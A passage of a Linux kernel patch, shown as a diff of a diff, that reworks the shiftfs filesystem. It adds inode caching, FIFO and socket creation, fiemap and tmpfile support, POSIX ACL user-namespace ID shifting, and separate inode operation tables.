++static int shiftfs_inode_test(struct inode *inode, void *data)
+ {
+-	struct inode *reali;
+-
+-	if (!dentry)
+-		return;
+-
+-	reali = dentry->d_inode;
+-
+-	if (!reali->i_op->get_link)
+-		inode->i_opflags |= IOP_NOFOLLOW;
++	return inode->i_private == data;
++}
+ 
+-	inode->i_mapping = reali->i_mapping;
+-	inode->i_private = dentry;
++static int shiftfs_inode_set(struct inode *inode, void *data)
++{
++	inode->i_private = data;
++	return 0;
+ }
+ 
+-static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
+-			       umode_t mode, const char *symlink,
+-			       struct dentry *hardlink, bool excl)
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++				 umode_t mode, const char *symlink,
++				 struct dentry *hardlink, bool excl)
+ {
+-	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode, *newi;
+-	const struct inode_operations *iop = reali->i_op;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
+-	bool op_ok = false;
++	const struct cred *oldcred;
++	struct cred *newcred;
++	void *loweri_iop_ptr = NULL;
++	umode_t modei = mode;
++	struct super_block *dir_sb = diri->i_sb;
++	struct dentry *lowerd_new = dentry->d_fsdata;
++	struct inode *inode = NULL, *loweri_dir = diri->i_private;
++	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
++	struct dentry *lowerd_link = NULL;
+ 
+ 	if (hardlink) {
+-		op_ok = iop->link;
++		loweri_iop_ptr = loweri_dir_iop->link;
+ 	} else {
+ 		switch (mode & S_IFMT) {
+ 		case S_IFDIR:
+-			op_ok = iop->mkdir;
++			loweri_iop_ptr = loweri_dir_iop->mkdir;
+ 			break;
+ 		case S_IFREG:
+-			op_ok = iop->create;
++			loweri_iop_ptr = loweri_dir_iop->create;
+ 			break;
+ 		case S_IFLNK:
+-			op_ok = iop->symlink;
++			loweri_iop_ptr = loweri_dir_iop->symlink;
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			loweri_iop_ptr = loweri_dir_iop->mknod;
++			break;
+ 		}
+ 	}
+-	if (!op_ok)
+-		return -EINVAL;
++	if (!loweri_iop_ptr) {
++		err = -EINVAL;
++		goto out_iput;
++	}
+ 
++	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
+ 
+-	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
+-	if (!newi)
+-		return -ENOMEM;
++	if (!hardlink) {
++		inode = new_inode(dir_sb);
++		if (!inode) {
++			err = -ENOMEM;
++			goto out_iput;
++		}
++
++		/*
++		 * new_inode() will have added the new inode to the super
++		 * block's list of inodes. Further below we will call
++		 * inode_insert5() Which would perform the same operation again
++		 * thereby corrupting the list. To avoid this raise I_CREATING
++		 * in i_state which will cause inode_insert5() to skip this
++		 * step. I_CREATING will be cleared by d_instantiate_new()
++		 * below.
++		 */
++		spin_lock(&inode->i_lock);
++		inode->i_state |= I_CREATING;
++		spin_unlock(&inode->i_lock);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++		inode_init_owner(inode, diri, mode);
++		modei = inode->i_mode;
++	}
+ 
+-	inode_lock_nested(reali, I_MUTEX_PARENT);
++	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
++					    dentry, modei, hardlink != NULL);
++	if (err)
++		goto out_iput;
+ 
+-	err = -EINVAL;		/* shut gcc up about uninit var */
+ 	if (hardlink) {
+-		struct dentry *realhardlink = hardlink->d_fsdata;
+-
+-		err = vfs_link(realhardlink, reali, new, NULL);
++		lowerd_link = hardlink->d_fsdata;
++		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
+ 	} else {
+-		switch (mode & S_IFMT) {
++		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(reali, new, mode);
++			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(reali, new, mode, excl);
++			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(reali, new, symlink);
++			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
++			break;
++		default:
++			err = -EINVAL;
++			break;
+ 		}
+ 	}
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_revert_object_creds(oldcred, newcred);
+ 
++	if (!err && WARN_ON(!lowerd_new->d_inode))
++		err = -EIO;
+ 	if (err)
+-		goto out_dput;
++		goto out_iput;
++
++	if (hardlink) {
++		inode = d_inode(hardlink);
++		ihold(inode);
++
++		/* copy up times from lower inode */
++		shiftfs_copyattr(d_inode(lowerd_link), inode);
++		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
++		d_instantiate(dentry, inode);
++	} else {
++		struct inode *inode_tmp;
++		struct inode *loweri_new = d_inode(lowerd_new);
++
++		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
++					  shiftfs_inode_test, shiftfs_inode_set,
++					  loweri_new);
++		if (unlikely(inode_tmp != inode)) {
++			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
++			iput(inode_tmp);
++			err = -EINVAL;
++			goto out_iput;
++		}
+ 
+-	shiftfs_fill_inode(newi, new);
++		ihold(loweri_new);
++		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
++				   0, lowerd_new);
++		d_instantiate_new(dentry, inode);
++	}
+ 
+-	d_instantiate(dentry, newi);
++	shiftfs_copyattr(loweri_dir, diri);
++	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
++		set_nlink(diri, loweri_dir->i_nlink);
+ 
+-	new = NULL;
+-	newi = NULL;
++	inode = NULL;
+ 
+- out_dput:
+-	dput(new);
+-	iput(newi);
+-	inode_unlock(reali);
++out_iput:
++	iput(inode);
++	inode_unlock(loweri_dir);
+ 
+ 	return err;
+ }
+@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry,
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
+@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
++			 dev_t rdev)
++{
++	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
++		return -EPERM;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ {
+-	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
+-
+-	inode_lock_nested(reali, I_MUTEX_PARENT);
+-
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	const struct cred *oldcred;
+ 
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+-		err = vfs_rmdir(reali, new);
++		err = vfs_rmdir(loweri, lowerd);
+ 	else
+-		err = vfs_unlink(reali, new, NULL);
++		err = vfs_unlink(loweri, lowerd, NULL);
++	inode_unlock(loweri);
++	revert_creds(oldcred);
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
+-	inode_unlock(reali);
++	shiftfs_copyattr(loweri, dir);
++	set_nlink(d_inode(dentry), loweri->i_nlink);
++	if (!err)
++		d_drop(dentry);
++
++	set_nlink(dir, loweri->i_nlink);
+ 
+ 	return err;
+ }
+@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 			  struct inode *newdir, struct dentry *new,
+ 			  unsigned int flags)
+ {
+-	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
+-		*realold = old->d_fsdata,
+-		*realnew = new->d_fsdata, *trap;
+-	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
++	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
++		      *lowerd_dir_new = new->d_parent->d_fsdata,
++		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
++		      *trapd;
++	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
++		     *loweri_dir_new = lowerd_dir_new->d_inode;
+ 	int err = -EINVAL;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	trap = lock_rename(rndd, rodd);
++	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
+ 
+-	if (trap == realold || trap == realnew)
++	if (trapd == lowerd_old || trapd == lowerd_new)
+ 		goto out_unlock;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
+-
+-	err = vfs_rename(realolddir, realold, realnewdir,
+-			 realnew, NULL, flags);
++	oldcred = shiftfs_override_creds(old->d_sb);
++	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
++			 NULL, flags);
++	revert_creds(oldcred);
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_copyattr(loweri_dir_old, olddir);
++	shiftfs_copyattr(loweri_dir_new, newdir);
+ 
+- out_unlock:
+-	unlock_rename(rndd, rodd);
++out_unlock:
++	unlock_rename(lowerd_dir_new, lowerd_dir_old);
+ 
+ 	return err;
+ }
+@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
+ 				     unsigned int flags)
+ {
+-	struct dentry *real = dir->i_private, *new;
+-	struct inode *reali = real->d_inode, *newi;
+-	const struct cred *oldcred, *newcred;
+-
+-	inode_lock(reali);
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
+-	shiftfs_old_creds(oldcred, &newcred);
+-	inode_unlock(reali);
++	struct dentry *new;
++	struct inode *newi;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_parent->d_fsdata;
++	struct inode *inode = NULL, *loweri = lowerd->d_inode;
++
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
+ 
+ 	if (IS_ERR(new))
+ 		return new;
+ 
+ 	dentry->d_fsdata = new;
+ 
+-	newi = NULL;
+-	if (!new->d_inode)
++	newi = new->d_inode;
++	if (!newi)
+ 		goto out;
+ 
+-	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
+-	if (!newi) {
++	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
++			     shiftfs_inode_test, shiftfs_inode_set, newi);
++	if (!inode) {
+ 		dput(new);
+ 		return ERR_PTR(-ENOMEM);
+ 	}
++	if (inode->i_state & I_NEW) {
++		/*
++		 * inode->i_private set by shiftfs_inode_set(), but we still
++		 * need to take a reference
++		*/
++		ihold(newi);
++		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
++		unlock_new_inode(inode);
++	}
+ 
+- out:
+-	return d_splice_alias(newi, dentry);
++out:
++	return d_splice_alias(inode, dentry);
+ }
+ 
+ static int shiftfs_permission(struct inode *inode, int mask)
+ {
+-	struct dentry *real = inode->i_private;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
+ 
+-	if (mask & MAY_NOT_BLOCK)
++	if (!loweri) {
++		WARN_ON(!(mask & MAY_NOT_BLOCK));
+ 		return -ECHILD;
++	}
+ 
+-	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
+-	if (iop->permission)
+-		err = iop->permission(reali, mask);
+-	else
+-		err = generic_permission(reali, mask);
+-	shiftfs_old_creds(oldcred, &newcred);
++	err = generic_permission(inode, mask);
++	if (err)
++		return err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = inode_permission(loweri, mask);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_fiemap(struct inode *inode,
++			  struct fiemap_extent_info *fieinfo, u64 start,
++			  u64 len)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
++
++	if (!loweri->i_op->fiemap)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
++		filemap_write_and_wait(loweri->i_mapping);
++	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
++			   umode_t mode)
++{
++	int err;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
++
++	if (!loweri->i_op->tmpfile)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(dir->i_sb);
++	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
+ 	struct iattr newattr = *attr;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
+ 	int err;
+ 
++	err = setattr_prepare(dentry, attr);
++	if (err)
++		return err;
++
+ 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+ 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	inode_lock(reali);
+-	if (iop->setattr)
+-		err = iop->setattr(real, &newattr);
+-	else
+-		err = simple_setattr(real, &newattr);
+-	inode_unlock(reali);
+-	shiftfs_old_creds(oldcred, &newcred);
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = notify_change(lowerd, attr, NULL);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
+ 
+-	if (err)
+-		return err;
++	shiftfs_copyattr(loweri, d_inode(dentry));
+ 
+-	/* all OK, reflect the change on our inode */
+-	setattr_copy(d_inode(dentry), attr);
+-	return 0;
++	return err;
+ }
+ 
+ static int shiftfs_getattr(const struct path *path, struct kstat *stat,
+ 			   u32 request_mask, unsigned int query_flags)
+ {
+ 	struct inode *inode = path->dentry->d_inode;
+-	struct dentry *real = path->dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
+-	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
+-	int err = 0;
+-
+-	if (iop->getattr)
+-		err = iop->getattr(&newpath, stat, request_mask, query_flags);
+-	else
+-		generic_fillattr(reali, stat);
++	struct dentry *lowerd = path->dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
++	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
++	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	const struct cred *oldcred;
++	int err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
++	revert_creds(oldcred);
+ 
+ 	if (err)
+ 		return err;
+ 
+ 	/* transform the underlying id */
+-	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
+-	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
++	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
++	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
+ 	return 0;
+ }
+ 
+-static const struct inode_operations shiftfs_inode_ops = {
+-	.lookup		= shiftfs_lookup,
+-	.getattr	= shiftfs_getattr,
+-	.setattr	= shiftfs_setattr,
+-	.permission	= shiftfs_permission,
+-	.mkdir		= shiftfs_mkdir,
+-	.symlink	= shiftfs_symlink,
+-	.get_link	= shiftfs_get_link,
+-	.readlink	= shiftfs_readlink,
+-	.unlink		= shiftfs_unlink,
+-	.rmdir		= shiftfs_rmdir,
+-	.rename		= shiftfs_rename,
+-	.link		= shiftfs_link,
+-	.create		= shiftfs_create,
+-	.mknod		= NULL,	/* no special files currently */
+-	.listxattr	= shiftfs_listxattr,
+-};
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
+ 
+-static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
+-				       struct dentry *dentry)
++static int
++shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
++	      struct posix_acl *acl)
+ {
+-	struct inode *inode;
+-
+-	inode = new_inode(sb);
+-	if (!inode)
+-		return NULL;
+-
+-	/*
+-	 * our inode is completely vestigial.  All lookups, getattr
+-	 * and permission checks are done on the underlying inode, so
+-	 * what the user sees is entirely from the underlying inode.
+-	 */
+-	mode &= S_IFMT;
++	int i;
++
++	for (i = 0; i < acl->a_count; i++) {
++		struct posix_acl_entry *e = &acl->a_entries[i];
++		switch(e->e_tag) {
++		case ACL_USER:
++			e->e_uid = shift_kuid(from, to, e->e_uid);
++			if (!uid_valid(e->e_uid))
++				return -EOVERFLOW;
++			break;
++		case ACL_GROUP:
++			e->e_gid = shift_kgid(from, to, e->e_gid);
++			if (!gid_valid(e->e_gid))
++				return -EOVERFLOW;
++			break;
++		}
++	}
++	return 0;
++}
+ 
+-	inode->i_ino = get_next_ino();
+-	inode->i_mode = mode;
+-	inode->i_flags |= S_NOATIME | S_NOCMTIME;
++static void
++shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
++		    void *value, size_t size)
++{
++	struct posix_acl_xattr_header *header = value;
++	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
++	int count;
++	kuid_t kuid;
++	kgid_t kgid;
+ 
+-	inode->i_op = &shiftfs_inode_ops;
++	if (!value)
++		return;
++	if (size < sizeof(struct posix_acl_xattr_header))
++		return;
++	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
++		return;
+ 
+-	shiftfs_fill_inode(inode, dentry);
++	count = posix_acl_xattr_count(size);
++	if (count < 0)
++		return;
++	if (count == 0)
++		return;
+ 
+-	return inode;
++	for (end = entry + count; entry != end; entry++) {
++		switch(le16_to_cpu(entry->e_tag)) {
++		case ACL_USER:
++			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kuid = shift_kuid(from, to, kuid);
++			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
++			break;
++		case ACL_GROUP:
++			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kgid = shift_kgid(from, to, kgid);
++			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
++			break;
++		default:
++			break;
++		}
++	}
+ }
+ 
+-static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
+ {
+-	struct super_block *sb = dentry->d_sb;
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct inode *loweri = inode->i_private;
++	const struct cred *oldcred;
++	struct posix_acl *lower_acl, *acl = NULL;
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	int size;
++	int err;
+ 
+-	if (ssi->mark)
+-		seq_show_option(m, "mark", NULL);
++	if (!IS_POSIXACL(loweri))
++		return NULL;
+ 
+-	return 0;
+-}
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	lower_acl = get_acl(loweri, type);
++	revert_creds(oldcred);
+ 
+-static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
+-{
+-	struct super_block *sb = dentry->d_sb;
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
+-	struct dentry *root = sb->s_root;
+-	struct dentry *realroot = root->d_fsdata;
+-	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
+-	int err;
++	if (lower_acl && !IS_ERR(lower_acl)) {
++		/* XXX: export posix_acl_clone? */
++		size = sizeof(struct posix_acl) +
++		       lower_acl->a_count * sizeof(struct posix_acl_entry);
++		acl = kmemdup(lower_acl, size, GFP_KERNEL);
++		posix_acl_release(lower_acl);
+ 
+-	err = vfs_statfs(&realpath, buf);
+-	if (err)
+-		return err;
++		if (!acl)
++			return ERR_PTR(-ENOMEM);
+ 
+-	buf->f_type = sb->s_magic;
++		refcount_set(&acl->a_refcount, 1);
+ 
+-	return 0;
++		err = shift_acl_ids(from_ns, to_ns, acl);
++		if (err) {
++			kfree(acl);
++			return ERR_PTR(err);
++		}
++	}
++
++	return acl;
+ }
+ 
+-static void shiftfs_put_super(struct super_block *sb)
++static int
++shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
++			   struct dentry *dentry, struct inode *inode,
++			   const char *name, void *buffer, size_t size)
+ {
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct inode *loweri = inode->i_private;
++	int ret;
++
++	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
++				buffer, size);
++	if (ret < 0)
++		return ret;
+ 
+-	mntput(ssi->mnt);
+-	put_user_ns(ssi->userns);
+-	kfree(ssi);
++	inode_lock(loweri);
++	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
++			    buffer, size);
++	inode_unlock(loweri);
++	return ret;
+ }
+ 
+-static const struct xattr_handler shiftfs_xattr_handler = {
+-	.prefix = "",
+-	.get    = shiftfs_xattr_get,
+-	.set    = shiftfs_xattr_set,
+-};
++static int
++shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct inode *loweri = inode->i_private;
++	int err;
+ 
+-const struct xattr_handler *shiftfs_xattr_handlers[] = {
+-	&shiftfs_xattr_handler,
+-	NULL
+-};
++	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
++		return -EOPNOTSUPP;
++	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
++		return value ? -EACCES : 0;
++	if (!inode_owner_or_capable(inode))
++		return -EPERM;
++
++	if (value) {
++		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
++				    loweri->i_sb->s_user_ns,
++				    (void *)value, size);
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++				       size, flags);
++	} else {
++		err = shiftfs_removexattr(dentry, handler->name);
++	}
+ 
+-static const struct super_operations shiftfs_super_ops = {
+-	.put_super	= shiftfs_put_super,
+-	.show_options	= shiftfs_show_options,
+-	.statfs		= shiftfs_statfs,
++	if (!err)
++		shiftfs_copyattr(loweri, inode);
++
++	return err;
++}
++
++static const struct xattr_handler
++shiftfs_posix_acl_access_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_ACCESS,
++	.flags = ACL_TYPE_ACCESS,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
+ };
+ 
+-struct shiftfs_data {
+-	void *data;
+-	const char *path;
++static const struct xattr_handler
++shiftfs_posix_acl_default_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
++	.flags = ACL_TYPE_DEFAULT,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
+ };
+ 
+-static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+-			      int silent)
+-{
+-	struct shiftfs_data *data = raw_data;
+-	char *name = kstrdup(data->path, GFP_KERNEL);
+-	int err = -ENOMEM;
+-	struct shiftfs_super_info *ssi = NULL;
+-	struct path path;
+-	struct dentry *dentry;
++#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
+ 
+-	if (!name)
+-		goto out;
++#define shiftfs_get_acl NULL
+ 
+-	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
+-	if (!ssi)
+-		goto out;
++#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
+ 
+-	err = -EPERM;
+-	err = shiftfs_parse_options(ssi, data->data);
++static const struct inode_operations shiftfs_dir_inode_operations = {
++	.lookup		= shiftfs_lookup,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.setattr	= shiftfs_setattr,
++	.create		= shiftfs_create,
++	.mknod		= shiftfs_mknod,
++	.permission	= shiftfs_permission,
++	.getattr	= shiftfs_getattr,
++	.listxattr	= shiftfs_listxattr,
++	.get_acl	= shiftfs_get_acl,
++};
++
++static const struct inode_operations shiftfs_file_inode_operations = {
++	.fiemap		= shiftfs_fiemap,
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++	.tmpfile	= shiftfs_tmpfile,
++};
++
++static const struct inode_operations shiftfs_special_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++};
++
++static const struct inode_operations shiftfs_symlink_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_link	= shiftfs_get_link,
++	.listxattr	= shiftfs_listxattr,
++	.setattr	= shiftfs_setattr,
++};
++
++static struct file *shiftfs_open_realfile(const struct file *file,
++					  struct path *realpath)
++{
++	struct file *lowerf;
++	const struct cred *oldcred;
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = realpath->dentry->d_inode;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	/* XXX: open_with_fake_path() not gauranteed to stay around, if
++	 * removed use dentry_open() */
++	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
++	revert_creds(oldcred);
++
++	return lowerf;
++}
++
++#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
++
++static int shiftfs_change_flags(struct file *file, unsigned int flags)
++{
++	struct inode *inode = file_inode(file);
++	int err;
++
++	/* if some flag changed that cannot be changed then something's amiss */
++	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
++		return -EIO;
++
++	flags &= SHIFTFS_SETFL_MASK;
++
++	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
++		return -EPERM;
++
++	if (flags & O_DIRECT) {
++		if (!file->f_mapping->a_ops ||
++		    !file->f_mapping->a_ops->direct_IO)
++			return -EINVAL;
++	}
++
++	if (file->f_op->check_flags) {
++		err = file->f_op->check_flags(flags);
++		if (err)
++			return err;
++	}
++
++	spin_lock(&file->f_lock);
++	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
++	spin_unlock(&file->f_lock);
++
++	return 0;
++}
++
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
++static int shiftfs_open(struct inode *inode, struct file *file)
++{
++	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
++	struct shiftfs_file_info *file_info;
++	struct file *realfile;
++	struct path *realpath;
++
++	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
++	if (!file_info)
++		return -ENOMEM;
++
++	realpath = &file_info->realpath;
++	realpath->mnt = ssi->mnt;
++	realpath->dentry = file->f_path.dentry->d_fsdata;
++
++	realfile = shiftfs_open_realfile(file, realpath);
++	if (IS_ERR(realfile)) {
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
++		return PTR_ERR(realfile);
++	}
++
++	file->private_data = file_info;
++	file_info->realfile = realfile;
++	return 0;
++}
++
